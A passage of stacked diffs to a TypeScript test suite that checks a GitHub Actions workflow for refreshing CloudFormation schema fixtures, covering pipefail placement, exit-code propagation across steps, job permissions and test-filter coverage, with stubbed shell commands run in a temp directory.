+        readFileSync(join(REPO_ROOT, 'scripts/diagnose-schema-refresh.mjs'), 'utf8')
+      ).toContain(heading);
+      expect(shellOf('Publish the refresh')).toContain(heading);
+    });
+
+    it('names the backfill umbrella issue explicitly', () => {
+      // A typo here posts the backfill list to an unrelated issue, silently.
+      const publish = steps.find((st) => st.name === 'Publish the refresh')!;
+      expect(publish.env?.['BACKFILL_UMBRELLA']).toBe('609');
+    });
+
     it('re-checks the PR is still OPEN before pushing onto its branch', () => {
       // A squash merge with --delete-branch between the guard and the push
       // would make the plain push RE-CREATE the deleted branch — an orphan ref
@@ -252,13 +313,21 @@ describe('cfn-schema-refresh workflow (issue #2718)', () => {
       const publish = shellOf('Publish the refresh');
       expect(publish).toContain('--json state');
       expect(publish).toMatch(/!= "OPEN"/);
+      // The `exit 0` is the check. Without it the comparison runs and the push
+      // proceeds anyway — inert, and the plain push then RE-CREATES the branch
+      // a merge just deleted.
+      const stateIdx = publish.indexOf('--json state');
+      const pushIdx = publish.indexOf('git push');
+      expect(stateIdx).toBeGreaterThanOrEqual(0);
+      expect(stateIdx, 'the OPEN re-check must precede the push').toBeLessThan(pushIdx);
+      expect(publish.slice(stateIdx, pushIdx)).toContain('exit 0');
     });
 
     it('passes the refresh skip list to the diagnosis', () => {
       // The flag existed and nothing passed it, so the "Not refreshed" section
       // could never render in production.
       expect(shellOf('Refresh fixtures from the public schema bundle')).toContain('/tmp/refresh.log');
-      expect(shellOf('Publish the refresh')).toContain('--skipped-log');
+      expect(shellOf('Diagnose what needs a decision')).toContain('--skipped-log');
     });
 
     it('fails the open-PR guard closed rather than open on a gh error', () => {

--- a/tests/unit/scripts/cfn-schema-refresh-workflow.test.ts
+++ b/tests/unit/scripts/cfn-schema-refresh-workflow.test.ts
@@ -760,9 +760,16 @@ describe('cfn-schema-refresh workflow (issue #2718)', () => {
       /^\s+issues: write$/m
     );
 
-    // Derived, not a fixed list: any `gh issue`/`gh api .../issues` call in the
-    // workflow requires that scope, so a future one cannot be added without it.
-    const usesIssueApi = /gh issue |\/issues\//.test(workflow);
+    // Derived from the SHELL BODIES, not the raw file. Over the raw file this
+    // anti-vacuity floor was itself vacuous: the workflow header cites an
+    // `.../issues/2718` URL and the permission's own rationale comment contains
+    // the words `gh issue comment`, so deleting the real call left it green and
+    // the "guards nothing" message could never fire. An anti-vacuity guard that
+    // is vacuous is the defect class this PR is about, in the guard against it.
+    const shellBodies = steps
+      .map((st) => (st.name ? shellOf(st.name) : ''))
+      .join('\n');
+    const usesIssueApi = /gh issue |\/issues\//.test(shellBodies);
     expect(usesIssueApi, 'no issue API call found — this assertion guards nothing').toBe(true);
   });
 

--- a/tests/unit/scripts/cfn-schema-refresh-workflow.test.ts
+++ b/tests/unit/scripts/cfn-schema-refresh-workflow.test.ts
@@ -20,7 +20,10 @@
  * had exactly those two holes.
  */
 import { describe, it, expect } from 'vite-plus/test';
-import { readFileSync } from 'node:fs';
+import { CHECK_GUIDANCE } from '../../../scripts/diagnose-schema-refresh.mjs';
+import { execFileSync } from 'node:child_process';
+import { existsSync, mkdtempSync, readFileSync, rmSync, writeFileSync } from 'node:fs';
+import { tmpdir } from 'node:os';
 import { parse as parseYaml } from 'yaml';
 import { join, dirname } from 'node:path';
 import { fileURLToPath } from 'node:url';
@@ -37,6 +40,33 @@ const workflow = readFileSync(WORKFLOW_PATH, 'utf8');
  */
 // eslint-disable-next-line @typescript-eslint/no-explicit-any
 const parsed: any = parseYaml(workflow);
+
+  const steps: Array<{
+    name?: string;
+    if?: string;
+    run?: string;
+    uses?: string;
+    env?: Record<string, string>;
+  }> =
+    parsed.jobs.refresh.steps;
+  const byName = (name: string) => {
+    const step = steps.find((s) => s.name === name);
+    expect(step, `no step named ${JSON.stringify(name)} — it was renamed or deleted`).toBeDefined();
+    return step!;
+  };
+
+  /**
+   * A step's shell with `#` comment lines removed. Load-bearing for the
+   * NEGATIVE assertions below: this workflow's comments deliberately QUOTE
+   * the wrong forms in order to explain why they are wrong (`git diff
+   * --quiet`, a bare `--force-with-lease`), so a naive `not.toContain` reads
+   * the explanation as the defect and fails on correct code.
+   */
+  const shellOf = (name: string) =>
+    byName(name)
+      .run!.split('\n')
+      .filter((l) => !/^\s*#/.test(l))
+      .join('\n');
 
 /**
  * The task the workflow invokes to do the capture. Named here as a literal
@@ -74,33 +104,6 @@ describe('cfn-schema-refresh workflow (issue #2718)', () => {
    * simply stops opening PRs, on a cadence nobody is watching.
    */
   describe('step wiring', () => {
-    const steps: Array<{
-      name?: string;
-      if?: string;
-      run?: string;
-      uses?: string;
-      env?: Record<string, string>;
-    }> =
-      parsed.jobs.refresh.steps;
-    const byName = (name: string) => {
-      const step = steps.find((s) => s.name === name);
-      expect(step, `no step named ${JSON.stringify(name)} — it was renamed or deleted`).toBeDefined();
-      return step!;
-    };
-
-    /**
-     * A step's shell with `#` comment lines removed. Load-bearing for the
-     * NEGATIVE assertions below: this workflow's comments deliberately QUOTE
-     * the wrong forms in order to explain why they are wrong (`git diff
-     * --quiet`, a bare `--force-with-lease`), so a naive `not.toContain` reads
-     * the explanation as the defect and fails on correct code.
-     */
-    const shellOf = (name: string) =>
-      byName(name)
-        .run!.split('\n')
-        .filter((l) => !/^\s*#/.test(l))
-        .join('\n');
-
     it('refreshes and probes drift UNCONDITIONALLY, gating only the publish', () => {
       // Load-bearing since the job stopped skipping: an open PR must not stop
       // the refresh, or every new AWS addition waits for that PR to merge —
@@ -375,20 +378,46 @@ describe('cfn-schema-refresh workflow (issue #2718)', () => {
       );
     });
 
-    it('captures the property-coverage status and carries it ACROSS steps', () => {
+    it('collects EVERY fixture-driven check, and the guidance table knows them all', () => {
+      // The list lives in the workflow and the guidance in the script, with
+      // nothing joining them — which is how `sdk-attr-coverage` and
+      // `enrichment-coverage` went unreported for eight rounds while
+      // `property-coverage` was being fixed. A fourth check added to one side
+      // and not the other fails here.
+      const regen = shellOf('Regenerate the derived artifacts');
+      const collected = [...regen.matchAll(/^\s*run_check (\S+)/gm)].map((m) => m[1]!);
+      expect(collected.length, 'no run_check invocations found').toBeGreaterThanOrEqual(3);
+      expect(new Set(collected)).toEqual(new Set(Object.keys(CHECK_GUIDANCE)));
+      // And each one really is fixture-driven — the property that makes a
+      // schema refresh able to redden it.
+      for (const check of collected) {
+        const task = check.replace(/^audit:/, '').replace(/:check$/, '');
+        const script = ['gen-' + task + '.ts', task + '.ts'].find((f) =>
+          existsSync(join(REPO_ROOT, 'scripts', f))
+        );
+        if (!script) continue; // property-coverage is a vitest run, not a script.
+        expect(
+          readFileSync(join(REPO_ROOT, 'scripts', script), 'utf8'),
+          `${check} does not read the fixtures — why is it in this list?`
+        ).toContain('cfn-schemas');
+      }
+    });
+
+    it('carries the failed-check list ACROSS steps', () => {
       // `|| echo` stops `set -e` aborting and nothing else, so the red never
       // reached the diagnosis — a failing coverage check rendered as "nothing
       // needs a decision". Two separate mistakes are pinned here: `$?` after a
       // `||` compound is the ECHO's status, and a shell variable does not
       // survive into the next `run:` at all.
       const regen = shellOf('Regenerate the derived artifacts');
-      expect(regen).toMatch(/if CDKD_GENERATE_BACKFILL=true vp test run property-coverage; then/);
-      expect(regen).toContain('property_coverage_rc=$?');
-      expect(regen, 'the status dies with this step\u2019s shell').toMatch(
-        /echo "PROPERTY_COVERAGE_RC=\$\{property_coverage_rc\}" >> "\$\{GITHUB_ENV\}"/
+      // A shell variable does not survive into the next `run:` at all, and an
+      // absent `--failed-checks` reads as "nothing failed" — so losing it here
+      // restores the exact silence this mechanism removes.
+      expect(regen, 'the list dies with this step\u2019s shell').toMatch(
+        /echo "FAILED_CHECKS=\$\{failed_checks\}" >> "\$\{GITHUB_ENV\}"/
       );
       const diagnose = shellOf('Diagnose what needs a decision');
-      expect(diagnose).toMatch(/--property-coverage-rc "\$\{PROPERTY_COVERAGE_RC\}"/);
+      expect(diagnose).toMatch(/--failed-checks "\$\{FAILED_CHECKS\}"/);
     });
 
     it('pins the cross-file literals the shell greps for', () => {
@@ -495,32 +524,81 @@ describe('cfn-schema-refresh workflow (issue #2718)', () => {
     expect(workflow).not.toMatch(/git commit -m "(feat|fix|perf)\(/);
   });
 
-  it('tolerates a red backfill regeneration instead of aborting before the PR exists', () => {
-    // A removed property leaves a bogus declaration no generator can retire, so
-    // that step is EXPECTED to fail on some cycles. Letting it stop the run
-    // would suppress the very PR through which the human finds out.
-    //
-    // The INVARIANT, not the spelling: under `set -e` the invocation must sit
-    // somewhere a non-zero status is not fatal. `||` and an `if` condition both
-    // qualify; a bare command does not. This case pinned the `||` text, and the
-    // status-capturing rewrite that kept the invariant reddened it.
-    // `shellOf` belongs to the step-wiring block; the comment strip matters
-    // here for the same reason it does there — a `#` line naming the command
-    // would satisfy every assertion below.
-    const regen = workflow
-      .split('\n')
-      .filter((l) => !/^\s*#/.test(l))
-      .join('\n');
-    const invocation = /CDKD_GENERATE_BACKFILL=true vp test run property-coverage/;
-    expect(regen).toMatch(invocation);
-    const line = regen.split('\n').find((l) => invocation.test(l))!;
-    expect(line, 'the step aborts before the PR exists').toMatch(
-      /(^\s*if\s|\|\|\s*(\\)?$|\|\|\s*\S)/
-    );
-    // And it still runs under strict mode — the tolerance is scoped to this one
-    // command, not bought by relaxing the whole step.
-    expect(regen).toContain('set -euo pipefail');
-  });
+  it('RUNS the regenerate step with every check red, and still reaches the end', () => {
+    // Executed, not pattern-matched. Two rewrites of this case pinned a
+    // SPELLING — first `||`, then `||`-or-`if` — and each time a rewrite that
+    // preserved the invariant reddened it. The invariant is behavioural: under
+    // `set -euo pipefail` a failing check must not abort the step, and every
+    // failure must reach `$GITHUB_ENV`. So the real shell runs, with the four
+    // commands it invokes stubbed.
+    const shell = shellOf('Regenerate the derived artifacts');
+    const dir = mkdtempSync(join(tmpdir(), 'cdkd-regen-'));
+    try {
+      const envFile = join(dir, 'github-env');
+      // Fails the CHECKS only. A stub that failed everything would abort on
+      // `gen:all-matrices` instead — which is correct behaviour and would have
+      // made this case pass for the wrong reason.
+      const vp = [
+        '#!/bin/sh',
+        'case "$*" in',
+        '  *audit:*:check|*"test run property-coverage"*) exit 1 ;;',
+        '  *) exit 0 ;;',
+        'esac',
+      ].join('\n');
+      writeFileSync(join(dir, 'vp'), `${vp}\n`, { mode: 0o755 });
+      // `env VAR=x vp ...` — drop the assignments and re-exec.
+      writeFileSync(
+        join(dir, 'env'),
+        '#!/bin/sh\nwhile [ $# -gt 0 ]; do case "$1" in *=*) shift ;; *) break ;; esac; done\nexec "$@"\n',
+        { mode: 0o755 }
+      );
+      writeFileSync(
+        join(dir, 'run.sh'),
+        `export PATH="${dir}:$PATH"\nexport GITHUB_ENV="${envFile}"\n${shell}\necho REACHED_END\n`
+      );
+      const out = execFileSync('bash', [join(dir, 'run.sh')], {
+        encoding: 'utf8',
+        stdio: ['ignore', 'pipe', 'pipe'],
+      });
+      expect(out, 'a failing check aborted the step').toContain('REACHED_END');
+      const written = readFileSync(envFile, 'utf8');
+      // Every check that failed is collected, comma-separated, none lost.
+      const line = written.split('\n').find((l) => l.startsWith('FAILED_CHECKS='))!;
+      expect(line, 'the failed list never reached GITHUB_ENV').toBeDefined();
+      const collected = line.slice('FAILED_CHECKS='.length).split(',').filter(Boolean);
+      expect(new Set(collected)).toEqual(new Set(Object.keys(CHECK_GUIDANCE)));
+    } finally {
+      rmSync(dir, { recursive: true, force: true });
+    }
+  }, 60_000);
+
+  it('RUNS the regenerate step with every check green, and collects nothing', () => {
+    // The success arm, which was unpinned: hard-coding a failure there would
+    // make every green cycle render "a decision is needed".
+    const shell = shellOf('Regenerate the derived artifacts');
+    const dir = mkdtempSync(join(tmpdir(), 'cdkd-regen-ok-'));
+    try {
+      const envFile = join(dir, 'github-env');
+      writeFileSync(join(dir, 'vp'), '#!/bin/sh\nexit 0\n', { mode: 0o755 });
+      writeFileSync(
+        join(dir, 'env'),
+        '#!/bin/sh\nwhile [ $# -gt 0 ]; do case "$1" in *=*) shift ;; *) break ;; esac; done\nexec "$@"\n',
+        { mode: 0o755 }
+      );
+      writeFileSync(
+        join(dir, 'run.sh'),
+        `export PATH="${dir}:$PATH"\nexport GITHUB_ENV="${envFile}"\n${shell}\n`
+      );
+      execFileSync('bash', [join(dir, 'run.sh')], { encoding: 'utf8' });
+      const written = readFileSync(envFile, 'utf8');
+      expect(written).toContain('FAILED_CHECKS=');
+      expect(written.split('\n').find((l) => l.startsWith('FAILED_CHECKS='))).toBe(
+        'FAILED_CHECKS='
+      );
+    } finally {
+      rmSync(dir, { recursive: true, force: true });
+    }
+  }, 60_000);
 
   it('denies permissions at the top level and grants them per job', () => {
     expect(workflow).toMatch(/^permissions: \{\}$/m);

--- a/tests/unit/scripts/cfn-schema-refresh-workflow.test.ts
+++ b/tests/unit/scripts/cfn-schema-refresh-workflow.test.ts
@@ -487,7 +487,20 @@ describe('cfn-schema-refresh workflow (issue #2718)', () => {
       const close = guidance.indexOf('```', open + 1);
       expect(open, 'the guidance no longer carries a command block').toBeGreaterThan(-1);
       expect(close, 'the command block is unterminated').toBeGreaterThan(open);
-      const command = guidance.slice(open + 1, close).map((l) => l.trim());
+      // Exactly one: the fence reads the FIRST block, and a second one renders
+      // into the PR body just as visibly while being fenced by nothing.
+      expect(
+        guidance.filter((l) => l.trim().startsWith('```')).length,
+        'more than one command block — only the first is fenced'
+      ).toBe(2);
+      // LEADING whitespace only. Trimming both ends stripped a trailing space
+      // AFTER the backslash before testing it — and `\ ` + newline is not a
+      // continuation in bash, so the pasted command stops there. Measured: one
+      // trailing space dropped five of the seven filters while the fence stayed
+      // green, which is the failure this fence exists for. A trailing space in
+      // a JS string literal is invisible in review and `vp fmt` does not see
+      // inside one.
+      const command = guidance.slice(open + 1, close).map((l) => l.replace(/^\s+/, ''));
       expect(command[0], 'the block does not start with the invocation').toBe('vp test run \\');
 
       // Every line but the last continues, or the shell ends the command there.
@@ -524,7 +537,11 @@ describe('cfn-schema-refresh workflow (issue #2718)', () => {
       // when the PR arrives. The table is prose; nothing else reads it.
       const runbook = readFileSync(join(REPO_ROOT, 'docs/schema-refresh-runbook.md'), 'utf8');
       for (const check of Object.keys(CHECK_GUIDANCE)) {
-        expect(runbook, `the runbook does not name ${check}`).toContain(check);
+        // The TABLE ROW, not the file. `property-coverage` also appears in two
+        // `vp test run` code blocks, so a whole-file `toContain` stayed green
+        // with its row deleted — and its row is the one most likely to be
+        // edited. The other three were bound only by coincidence.
+        expect(runbook, `the runbook table does not name ${check}`).toContain(`| \`${check}\` |`);
       }
     });
 

--- a/tests/unit/scripts/cfn-schema-refresh-workflow.test.ts
+++ b/tests/unit/scripts/cfn-schema-refresh-workflow.test.ts
@@ -537,11 +537,13 @@ describe('cfn-schema-refresh workflow (issue #2718)', () => {
       const envFile = join(dir, 'github-env');
       // Fails the CHECKS only. A stub that failed everything would abort on
       // `gen:all-matrices` instead — which is correct behaviour and would have
-      // made this case pass for the wrong reason.
+      // made this case pass for the wrong reason. The pattern covers the audit
+      // tasks AND every `vp test run` filter: naming one filter left the newest
+      // check passing and the set assertion caught it.
       const vp = [
         '#!/bin/sh',
         'case "$*" in',
-        '  *audit:*:check|*"test run property-coverage"*) exit 1 ;;',
+        '  *audit:*:check|*"test run"*) exit 1 ;;',
         '  *) exit 0 ;;',
         'esac',
       ].join('\n');

--- a/tests/unit/scripts/cfn-schema-refresh-workflow.test.ts
+++ b/tests/unit/scripts/cfn-schema-refresh-workflow.test.ts
@@ -410,7 +410,14 @@ describe('cfn-schema-refresh workflow (issue #2718)', () => {
       }
     });
 
-    it('covers EVERY zero-headroom suite, and every filter matches something', () => {
+    it('covers every suite asserting silentDrop is empty, and every filter matches something', () => {
+      // BOUND, stated because an over-claimed fence is what this PR keeps
+      // producing: the derivation keys on ONE assertion spelling
+      // (`silentDrop.keys() ... toEqual([])`). The two named non-family filters
+      // are hand-listed and unfenced, and `gen-sdk-attr-coverage.test.ts`'s
+      // `findGaps(report)).toEqual([])` is zero-headroom in a different shape —
+      // substantively covered, since `audit:sdk-attr-coverage:check` runs the
+      // same predicate and is its own `run_check`, but invisible here.
       // Five suites assert `silentDrop` is empty against the REAL coverage, so
       // one writable property AWS adds to any of their types reds CI — while
       // `property-coverage` under `CDKD_GENERATE_BACKFILL` absorbs the same
@@ -420,9 +427,18 @@ describe('cfn-schema-refresh workflow (issue #2718)', () => {
         readdirSync(dir, { withFileTypes: true }).flatMap((e) =>
           e.isDirectory() ? walk(join(dir, e.name)) : [join(dir, e.name)]
         );
-      const testFiles = walk(join(REPO_ROOT, 'tests/unit')).filter((f) => f.endsWith('.test.ts'));
-      const zeroHeadroom = testFiles.filter((f) =>
-        /silentDrop\.keys\(\)[\s\S]{0,80}?toEqual\(\[\]\)/.test(readFileSync(f, 'utf8'))
+      // `tests/**` AND `src/**` — vitest's include covers both, and walking
+      // `tests/unit` alone would miss a family member added anywhere else.
+      const testFiles = [
+        ...walk(join(REPO_ROOT, 'tests')),
+        ...walk(join(REPO_ROOT, 'src')),
+      ].filter((f) => f.endsWith('.test.ts'));
+      const zeroHeadroom = testFiles.filter(
+        (f) =>
+          // This file CONTAINS the pattern, as the literal doing the matching —
+          // widening the walk to all of `tests/**` made the fence derive itself.
+          f !== fileURLToPath(import.meta.url) &&
+          /silentDrop\.keys\(\)[\s\S]{0,80}?toEqual\(\[\]\)/.test(readFileSync(f, 'utf8'))
       );
       expect(
         zeroHeadroom.length,
@@ -459,6 +475,28 @@ describe('cfn-schema-refresh workflow (issue #2718)', () => {
           `filter ${JSON.stringify(needle)} starts with a dash — vitest reads it as a flag`
         ).toBe(false);
       }
+
+      // The GUIDANCE BODY must hand out these same filters. Nothing fenced a
+      // row's contents — only the key SET — so round 10 widened the workflow
+      // and left the rendered command naming three files of eleven: a red from
+      // one of the four uncovered family members printed a paste-able command
+      // that comes back GREEN. The report's own silence, inside the fix for it.
+      const guidance = CHECK_GUIDANCE['fixture-consumer-tests']!;
+      const inGuidance = guidance
+        .join('\n')
+        .split('\n')
+        .map((l) => l.replace(/\\$/, '').trim())
+        .filter((l) => l !== '' && !l.startsWith('```') && !l.startsWith('vp test run'));
+      for (const needle of filters) {
+        expect(
+          inGuidance,
+          `the rendered command omits ${JSON.stringify(needle)} — it will come back green`
+        ).toContain(needle);
+      }
+      // And no EXTRA filter in the guidance either: one the workflow does not
+      // run is a command whose red the job never collected.
+      const guidanceFilters = inGuidance.filter((l) => !l.includes(' '));
+      expect(new Set(guidanceFilters)).toEqual(new Set(filters));
 
       // And a filter matching NOTHING is a silent narrowing: vitest ignores a
       // non-matching positional when others match, so renaming a file removes

--- a/tests/unit/scripts/cfn-schema-refresh-workflow.test.ts
+++ b/tests/unit/scripts/cfn-schema-refresh-workflow.test.ts
@@ -752,6 +752,18 @@ describe('cfn-schema-refresh workflow (issue #2718)', () => {
     expect(workflow).toMatch(/^permissions: \{\}$/m);
     expect(workflow).toMatch(/^\s+contents: write$/m);
     expect(workflow).toMatch(/^\s+pull-requests: write$/m);
+    // Asserted because it was MISSING: `gh issue comment` needs `issues:
+    // write`, `pull-requests: write` covers PR comments only, and the call's
+    // own `|| echo "::warning::"` turns the resulting 403 into a green job with
+    // the umbrella silently never updated.
+    expect(workflow, 'gh issue comment cannot work without issues: write').toMatch(
+      /^\s+issues: write$/m
+    );
+
+    // Derived, not a fixed list: any `gh issue`/`gh api .../issues` call in the
+    // workflow requires that scope, so a future one cannot be added without it.
+    const usesIssueApi = /gh issue |\/issues\//.test(workflow);
+    expect(usesIssueApi, 'no issue API call found — this assertion guards nothing').toBe(true);
   });
 
   it('pins every action to a full commit SHA', () => {

--- a/tests/unit/scripts/cfn-schema-refresh-workflow.test.ts
+++ b/tests/unit/scripts/cfn-schema-refresh-workflow.test.ts
@@ -360,7 +360,11 @@ describe('cfn-schema-refresh workflow (issue #2718)', () => {
       // "additions only" over a checker that never ran.
       const diagnose = shellOf('Diagnose what needs a decision');
       expect(diagnose).toContain('nested_key_rc=$?');
-      expect(diagnose).toContain('--nested-key-rc');
+      // The VARIABLE, not just the flag: `--nested-key-rc 0` hard-coded would
+      // satisfy a bare flag-presence check while restoring the behaviour the
+      // flag exists to remove, and the script's absent-flag arm defaults to 0
+      // for the by-hand invocation.
+      expect(diagnose).toMatch(/--nested-key-rc "\$\{nested_key_rc\}"/);
       // Captured immediately after the invocation: any command in between
       // overwrites `$?` and the status becomes that command's.
       const lines = diagnose.split('\n').map((l) => l.trim());

--- a/tests/unit/scripts/cfn-schema-refresh-workflow.test.ts
+++ b/tests/unit/scripts/cfn-schema-refresh-workflow.test.ts
@@ -375,6 +375,22 @@ describe('cfn-schema-refresh workflow (issue #2718)', () => {
       );
     });
 
+    it('captures the property-coverage status and carries it ACROSS steps', () => {
+      // `|| echo` stops `set -e` aborting and nothing else, so the red never
+      // reached the diagnosis — a failing coverage check rendered as "nothing
+      // needs a decision". Two separate mistakes are pinned here: `$?` after a
+      // `||` compound is the ECHO's status, and a shell variable does not
+      // survive into the next `run:` at all.
+      const regen = shellOf('Regenerate the derived artifacts');
+      expect(regen).toMatch(/if CDKD_GENERATE_BACKFILL=true vp test run property-coverage; then/);
+      expect(regen).toContain('property_coverage_rc=$?');
+      expect(regen, 'the status dies with this step\u2019s shell').toMatch(
+        /echo "PROPERTY_COVERAGE_RC=\$\{property_coverage_rc\}" >> "\$\{GITHUB_ENV\}"/
+      );
+      const diagnose = shellOf('Diagnose what needs a decision');
+      expect(diagnose).toMatch(/--property-coverage-rc "\$\{PROPERTY_COVERAGE_RC\}"/);
+    });
+
     it('pins the cross-file literals the shell greps for', () => {
       // Producer and consumer live in different files with nothing joining
       // them: either reword silently empties the skip list or kills the
@@ -483,7 +499,27 @@ describe('cfn-schema-refresh workflow (issue #2718)', () => {
     // A removed property leaves a bogus declaration no generator can retire, so
     // that step is EXPECTED to fail on some cycles. Letting it stop the run
     // would suppress the very PR through which the human finds out.
-    expect(workflow).toMatch(/CDKD_GENERATE_BACKFILL=true vp test run property-coverage \|\|/);
+    //
+    // The INVARIANT, not the spelling: under `set -e` the invocation must sit
+    // somewhere a non-zero status is not fatal. `||` and an `if` condition both
+    // qualify; a bare command does not. This case pinned the `||` text, and the
+    // status-capturing rewrite that kept the invariant reddened it.
+    // `shellOf` belongs to the step-wiring block; the comment strip matters
+    // here for the same reason it does there — a `#` line naming the command
+    // would satisfy every assertion below.
+    const regen = workflow
+      .split('\n')
+      .filter((l) => !/^\s*#/.test(l))
+      .join('\n');
+    const invocation = /CDKD_GENERATE_BACKFILL=true vp test run property-coverage/;
+    expect(regen).toMatch(invocation);
+    const line = regen.split('\n').find((l) => invocation.test(l))!;
+    expect(line, 'the step aborts before the PR exists').toMatch(
+      /(^\s*if\s|\|\|\s*(\\)?$|\|\|\s*\S)/
+    );
+    // And it still runs under strict mode — the tolerance is scoped to this one
+    // command, not bought by relaxing the whole step.
+    expect(regen).toContain('set -euo pipefail');
   });
 
   it('denies permissions at the top level and grants them per job', () => {

--- a/tests/unit/scripts/cfn-schema-refresh-workflow.test.ts
+++ b/tests/unit/scripts/cfn-schema-refresh-workflow.test.ts
@@ -287,12 +287,16 @@ describe('cfn-schema-refresh workflow (issue #2718)', () => {
     it('gives every step that runs a pipeline a pipefail before it', () => {
       // The generalisation of the defect above, so the next pipeline added to
       // any step cannot reintroduce it silently.
+      // Through `shellOf`, not raw `run`: the Refresh step's own comment says
+      // "`set -o pipefail` is REQUIRED here", which put the token at index 10
+      // and left this case green with the real `set -o pipefail` DELETED. That
+      // is the exact vacuity `shellOf` exists to remove.
       for (const step of steps) {
-        const run = step.run;
-        if (!run) continue;
-        const pipeAt = run.search(/\S \| \S|\|\s*\n/);
+        if (!step.name || !step.run) continue;
+        const shell = shellOf(step.name);
+        const pipeAt = shell.search(/\S \| \S|\|\s*\n/);
         if (pipeAt === -1) continue;
-        const at = run.indexOf('pipefail');
+        const at = shell.indexOf('pipefail');
         expect(at, `${step.name}: runs a pipeline with no pipefail`).toBeGreaterThan(-1);
         expect(at, `${step.name}: pipefail is set after its first pipeline`).toBeLessThan(pipeAt);
       }
@@ -348,6 +352,23 @@ describe('cfn-schema-refresh workflow (issue #2718)', () => {
       expect(guardAt).toBeLessThan(linkAt);
       // And the comment still fires outside that guard.
       expect(publish.indexOf('${BACKFILL_UMBRELLA}')).toBeGreaterThan(linkAt);
+    });
+
+    it('passes the checker’s EXIT CODE, not only its output', () => {
+      // Text alone was not enough: an empty log, a `task not found` and an OOM
+      // kill all carry no announcement to grep for, and each rendered
+      // "additions only" over a checker that never ran.
+      const diagnose = shellOf('Diagnose what needs a decision');
+      expect(diagnose).toContain('nested_key_rc=$?');
+      expect(diagnose).toContain('--nested-key-rc');
+      // Captured immediately after the invocation: any command in between
+      // overwrites `$?` and the status becomes that command's.
+      const lines = diagnose.split('\n').map((l) => l.trim());
+      const runAt = lines.findIndex((l) => l.startsWith('vp run audit:nested-key-coverage:check'));
+      expect(runAt).toBeGreaterThan(-1);
+      expect(lines[runAt + 1], '$? is captured after some other command ran').toBe(
+        'nested_key_rc=$?'
+      );
     });
 
     it('pins the cross-file literals the shell greps for', () => {

--- a/tests/unit/scripts/cfn-schema-refresh-workflow.test.ts
+++ b/tests/unit/scripts/cfn-schema-refresh-workflow.test.ts
@@ -22,7 +22,14 @@
 import { describe, it, expect } from 'vite-plus/test';
 import { CHECK_GUIDANCE } from '../../../scripts/diagnose-schema-refresh.mjs';
 import { execFileSync } from 'node:child_process';
-import { existsSync, mkdtempSync, readFileSync, rmSync, writeFileSync } from 'node:fs';
+import {
+  existsSync,
+  mkdtempSync,
+  readFileSync,
+  readdirSync,
+  rmSync,
+  writeFileSync,
+} from 'node:fs';
 import { tmpdir } from 'node:os';
 import { parse as parseYaml } from 'yaml';
 import { join, dirname } from 'node:path';
@@ -400,6 +407,67 @@ describe('cfn-schema-refresh workflow (issue #2718)', () => {
           readFileSync(join(REPO_ROOT, 'scripts', script), 'utf8'),
           `${check} does not read the fixtures — why is it in this list?`
         ).toContain('cfn-schemas');
+      }
+    });
+
+    it('covers EVERY zero-headroom suite, and every filter matches something', () => {
+      // Five suites assert `silentDrop` is empty against the REAL coverage, so
+      // one writable property AWS adds to any of their types reds CI — while
+      // `property-coverage` under `CDKD_GENERATE_BACKFILL` absorbs the same
+      // addition and stays green. Naming one of them covered three files of the
+      // five. The family is DERIVED here so a sixth cannot be added silently.
+      const walk = (dir: string): string[] =>
+        readdirSync(dir, { withFileTypes: true }).flatMap((e) =>
+          e.isDirectory() ? walk(join(dir, e.name)) : [join(dir, e.name)]
+        );
+      const testFiles = walk(join(REPO_ROOT, 'tests/unit')).filter((f) => f.endsWith('.test.ts'));
+      const zeroHeadroom = testFiles.filter((f) =>
+        /silentDrop\.keys\(\)[\s\S]{0,80}?toEqual\(\[\]\)/.test(readFileSync(f, 'utf8'))
+      );
+      expect(
+        zeroHeadroom.length,
+        'no zero-headroom suite found — the derivation broke, not the coverage'
+      ).toBeGreaterThanOrEqual(5);
+
+      const regen = shellOf('Regenerate the derived artifacts');
+      // Line continuations joined first: the invocation is written across two
+      // lines, so a naive per-line match finds only the `run_check` half.
+      const flat = regen
+        .replace(/\\\n\s*/g, ' ')
+        .split('\n')
+        .map((l) => l.trim())
+        .join('\n');
+      const line = flat.match(/run_check fixture-consumer-tests\s+vp test run ([^\n]*)/);
+      expect(line, 'the fixture-consumer run_check is gone').not.toBeNull();
+      const filters = line![1]!.trim().split(/\s+/).filter(Boolean);
+
+      for (const file of zeroHeadroom) {
+        const rel = file.slice(REPO_ROOT.length + 1);
+        expect(
+          filters.some((needle) => rel.includes(needle)),
+          `${rel} asserts zero headroom and no filter selects it`
+        ).toBe(true);
+      }
+
+      for (const needle of filters) {
+        // A leading dash is parsed as a FLAG, not a filter: `-props` killed the
+        // whole step with `Unknown option \`-p\``, and the substring check below
+        // passed it happily — the filter matched the filenames it was never
+        // going to be given to vitest as.
+        expect(
+          needle.startsWith('-'),
+          `filter ${JSON.stringify(needle)} starts with a dash — vitest reads it as a flag`
+        ).toBe(false);
+      }
+
+      // And a filter matching NOTHING is a silent narrowing: vitest ignores a
+      // non-matching positional when others match, so renaming a file removes
+      // its coverage with no red anywhere.
+      for (const needle of filters) {
+        expect(
+          testFiles.some((f) => f.slice(REPO_ROOT.length + 1).includes(needle)),
+          `filter ${JSON.stringify(needle)} matches no test file`
+        ).toBe(true);
       }
     });
 

--- a/tests/unit/scripts/cfn-schema-refresh-workflow.test.ts
+++ b/tests/unit/scripts/cfn-schema-refresh-workflow.test.ts
@@ -109,7 +109,11 @@ describe('cfn-schema-refresh workflow (issue #2718)', () => {
       for (const name of ['Refresh fixtures from the public schema bundle', 'Detect drift']) {
         expect(byName(name).if).toBeUndefined();
       }
-      for (const name of ['Regenerate the derived artifacts', 'Publish the refresh']) {
+      for (const name of [
+        'Regenerate the derived artifacts',
+        'Diagnose what needs a decision',
+        'Publish the refresh',
+      ]) {
         expect(byName(name).if).toBe("steps.drift.outputs.drifted == 'true'");
       }
     });
@@ -270,8 +274,28 @@ describe('cfn-schema-refresh workflow (issue #2718)', () => {
       // the `tee` added for the skip list reports ITS status, and the refresh's
       // exit 2 on a capture failure becomes "no drift" and a green run.
       const refresh = shellOf('Refresh fixtures from the public schema bundle');
-      expect(refresh).toContain('tee /tmp/refresh.log');
-      expect(refresh).toContain('set -o pipefail');
+      // Position, not presence: the token appearing anywhere in the step is
+      // satisfied by a `set -o pipefail` written AFTER the pipeline, which
+      // protects nothing. Measured — moving it below the `tee` left this green.
+      const pipefailAt = refresh.indexOf('set -o pipefail');
+      const teeAt = refresh.indexOf('tee /tmp/refresh.log');
